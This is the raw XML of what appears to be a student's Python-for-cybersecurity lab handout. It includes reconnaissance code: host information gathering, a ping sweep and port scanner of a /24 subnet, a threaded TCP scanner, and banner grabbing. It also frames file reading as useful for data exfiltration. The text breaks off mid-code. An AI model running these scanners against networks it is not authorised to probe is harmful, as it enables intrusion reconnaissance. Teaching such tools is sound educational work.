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AC62A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  <w:t>AREESHA RAHEEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1276647D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  <w:t>55039</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DA1F5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u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CYBERSECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC913D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lang w:val="zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab 1: Foundations of Python for Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B3674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1: Python Essentials for Security</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="665D2143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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0602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Before diving into specific cybersecurity applications, it's essential to understand how Python's core features apply to security contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58FACE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Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBB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Data Types for Security Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3887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Strings for text manipulation and payload creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B506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Bytes and bytearrays for binary data handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568EE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Lists and dictionaries for data organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569C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Error Handling in Security Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C4983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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1C34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Potentially risky code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC681DE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connection = establish_connection(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774984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response = connection.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B64283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except ConnectionError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251902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print(f"Connection failed: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11840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Implement fallback or graceful exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CBD48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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9E4E0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print(f"Unexpected error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9D51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Log the error and terminate safely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA44DE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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54218ED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Always clean up resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8A2E42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'connection' in locals():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E986FD2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connection.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0866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Functions and Modularity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C87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Creating reusable security functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42833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Organizing code into logical modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC0365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2: Working with Files and System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87804F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System Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013E91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Python can gather crucial system information for security assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250B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platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C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2AA6F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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CC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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4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7C5B3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get_system_info():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE98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 = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAC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info['Platform'] = platform.system()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D9C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info['Platform Release'] = platform.release()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D3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info['Platform Version'] = platform.version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A39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info['Architecture'] = platform.machine()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524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info['Hostname'] = socket.gethostname()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE9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info['IP Address'] = socket.gethostbyname(socket.gethostname())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61244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info['MAC Address'] = ':'.join(['{:02x}'.format((uuid.getnode() &gt;&gt; elements) &amp; 0xff) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14899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       for elements in range(0,48,8)][::-1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF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info['Processor'] = platform.processor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57228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info['RAM'] = str(round(psutil.virtual_memory().total / (1024.0 **3)))+" GB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB9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info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D4C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057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system_info = get_system_info()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157C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for key, value in system_info.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FB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print(f"{key}: {value}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E9F2E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File Operations for Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56903FC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File operations are fundamental for tasks like log analysis and data exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246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Reading sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776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read_file_safely(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13308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10222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open(filename, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB56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content = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53176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content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7CC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FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB0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print(f"Warning: {filename} not found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4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PermissionError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A160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print(f"Error: No permission to read {filename}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26891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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29541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79A7E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Writing discovered information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28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log_findings(filename, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE9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with open(filename, 'a') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29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timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F92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file.write(f"[{timestamp}] {data}\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BBE2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3: Network Communication Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237226F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Socket Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E3E3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Sockets are the foundation of network communication in cybersecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1A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51A0E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7230D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basic_port_check(host, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F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"""Check if a specific port is open on the target host"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFD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sock.settimeout(2)  # 2 second timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16127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A643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result = sock.connect_ex((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32567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sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42535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704C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result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56138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True  # Port is open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C6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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FA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  # Port is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908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DB2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3E00E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target = "127.0.0.1"  # localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BB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common_ports = [22, 80, 443]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8E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2BDBA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for port in common_ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD93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basic_port_check(target, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB8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print(f"Port {port} is open on {target}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BD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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15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print(f"Port {port} is closed on {target}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1ACE6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 xml:space="preserve">HTTP Requests with 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requests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 xml:space="preserve"> Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5458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The 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requests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library is essential for web-based security testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99E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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798F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6962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check_web_server(url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FE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"""Basic web server fingerprinting"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6E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7A1CD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response = requests.get(url, timeout=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D147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print(f"Status Code: {response.status_code}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D49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B96E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server header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2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server = response.headers.get('Server', 'Unknown')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D87B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print(f"Server: {server}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AA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1F25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for interesting headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F6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header in ['X-Powered-By', 'X-AspNet-Version', 'X-Runtime']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15189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header in response.headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6168E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print(f"{header}: {response.headers[header]}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BC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185A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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8D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requests.exceptions.RequestException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53244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 connecting to {url}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B2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7368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6C52B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check_web_server("http://example.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FFC67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4: Lab Exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D3BD4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Exercise 1: System Reconnaissance Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD994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Objective: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Create a basic system reconnaissance tool that gathers and reports system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBE4DC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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B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Extend the 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get_system_info()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function to include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465641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List of running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250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Logged-in users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D66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Network interfaces and their IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38781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Format the output in a readable report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C96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Add functionality to save the report to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCF56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Sample Code Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2E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platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A05D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67DED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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3AC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getpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F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datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37709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2D889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get_system_info():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614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Basic system info gathering (as shown previously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FC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YOUR CODE HERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E7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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46B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737B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get_running_processes():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB7A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processes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40B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proc in psutil.process_iter(['pid', 'name', 'username']):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99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processes.append(proc.info)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095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processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07394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C73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generate_report(filename=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D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Collect all information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53C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 = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7D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report.append("=== SYSTEM RECONNAISSANCE REPORT ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18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report.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA9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report.append(f"User: {getpass.getuser()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47479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report.append("\n=== SYSTEM INFORMATION ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33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ECA4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Get and format system info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD9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YOUR CODE HERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD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5693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report.append("\n=== RUNNING PROCESSES ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413DE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Get and format process info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65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YOUR CODE HERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68A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279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Format as string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E8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report_text = "\n".join(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D8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01F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Save to file if requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739C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filename:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70519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open(filename, 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B375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f.write(report_text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570C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0EC6C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report_text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9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69A6C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Execute and print the report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14793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print(generate_report("system_recon.txt"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15509E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Exercise 2: Basic Network Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43F8D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Objective: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Create a simple network scanner that identifies hosts and open ports on a local network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB32AE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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511F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Implement ping functionality to discover live hosts on a subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052D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For each live host, scan a specified range of ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DF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Report findings in a structured format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA321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Sample Code Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F3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08F1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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A9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ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D00D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platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05014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concurrent.futures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D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7046B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ping_host(ip):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BDF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"""Check if host is responsive to ping"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C25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param = '-n' if platform.system().lower() == 'windows' else '-c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29977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command = ['ping', param, '1', str(ip)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D8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73FF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2BBF5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subprocess.check_output(command, stderr=subprocess.STDOUT, universal_newlines=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C9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str(ip)  # Host is up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC9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subprocess.CalledProcessError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7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  # Host is down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A89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B3BD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scan_port(ip, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65F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"""Check if specific port is open on host"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E8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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35129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sock.settimeout(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6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result = sock.connect_ex((str(ip), port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7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sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782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5758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result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122C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port  # Port is open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBDD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None  # Port is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589AE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09FB7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scan_network(network="192.168.1.0/24", port_range=(1, 100)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F2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"""Scan network for live hosts and open ports"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF3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network = ipaddress.IPv4Network(network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB78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live_hosts = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF23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6600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Find live hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3F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print(f"Scanning network {network} for live hosts...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D9E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with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31188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results = executor.map(ping_host, network.hosts())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58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119B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result in results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AF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result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BB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live_hosts.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67A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4F01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print(f"Found {len(live_hosts)} live hosts")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2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C84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Scan ports on live hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B4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results = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5620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9429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host in live_hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA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print(f"Scanning ports on {host}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C4D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open_ports = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0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7F6D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port in range(port_range[0], port_range[1] + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09508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 = scan_port(host, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F033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result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28B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open_ports.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8A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0370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results[host] = open_ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206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25D2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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A7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A330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Execute the scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCA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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122B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IMPORTANT: Only scan networks you own or have permission to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC98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scan_results = scan_network("192.168.1.0/24", (20, 100))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F02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6A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Print results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA1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host, ports in scan_results.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62309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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A46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print(f"\nHost {host} has {len(ports)} open ports:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBF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port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96B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service = "unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A52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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964C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service = socket.getservbyport(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A283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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1882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  - Port {port}: {service}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A3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345A0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print(f"\nHost {host} has no open ports in the specified range")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314ED8CB">
      <w:pPr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E934A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1: Port Scanning and Network Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522179E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Advanced Port Scanning Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCAA6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Port scanning is a fundamental security assessment technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635F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5318D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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732D5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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5B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queue import Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D1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AC8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tcp_connect_scan(target_ip, port, timeout=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F05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"""TCP Connect scan - attempts to establish a full connection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B725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33802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sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCCF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sock.settimeout(timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833A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result = sock.connect_ex((target_ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D460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sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454C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result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E876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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A78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59629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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8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59A7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0C9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syn_scan(target_ip, port, timeout=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B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"""SYN scan simulation (Note: Actual SYN scan requires raw sockets/admin privileges)"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71B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This is a simplified version for educational purposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3858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In reality, you would use a library like Scapy for this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6A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tcp_connect_scan(target_ip, port, timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E30D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F5F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threaded_port_scan(target_ip, ports, scan_type='connect', workers=100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E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"""Multi-threaded port scanner"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8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open_ports = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B5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print_lock = threading.Lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEE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port_queue = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F009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C638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Add ports to the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51395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port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB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port_queue.put(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B9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6841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scan_worker():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B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while not port_queue.empty():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BDD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 = port_queue.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0E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scan_type == 'syn':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF0A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result = syn_scan(target_ip, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35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else:  # connect scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F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result = tcp_connect_scan(target_ip, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C61B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0A3AC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result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF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with print_lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F09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print(f"Port {port} is open")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B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open_ports.append(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32330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port_queue.task_done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B1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B96D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Create worker threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934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_ in range(workers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B96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 = threading.Thread(target=scan_worker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB4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t.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8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t.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8E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70F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Wait for all tasks to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF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port_queue.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D9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open_ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11529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602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19847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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3A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target = "127.0.0.1"  # Change to your target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70F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port_range = range(1, 1025)  # Common ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A38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F1FC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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E2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open_ports = threaded_port_scan(target, port_range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E8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FCA8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print(f"\nScan completed in {time.time() - start_time:.2f} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8EE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print(f"Open ports on {target}: {open_ports}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B79A62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Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B446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Identifying service versions can reveal vulnerable software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D3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75E62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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93E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ADF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grab_banner(ip, port, timeout=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F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"""Attempt to grab service banner from an open port"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C7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7956B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socket.setdefaulttimeout(timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D4B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 = socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79881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s.connect((ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A950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165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Send a simple HTTP request if it's likely a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286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port in [80, 443, 8080, 8443]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57421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s.send(b'GET / HTTP/1.1\r\nHost: ' + ip.encode() + b'\r\n\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37F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F33B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For other services, just try to read what's sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA89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banner = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31962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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4F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banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195AE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB4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7B36A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identify_service(banner, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F7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"""Attempt to identify service from the banner"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11B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not banner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FED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"Unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E8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E16D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banner_str = str(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F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32419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Simple regex patterns for common services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29056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patterns = {</w:t>
      </w:r>
    </w:p>
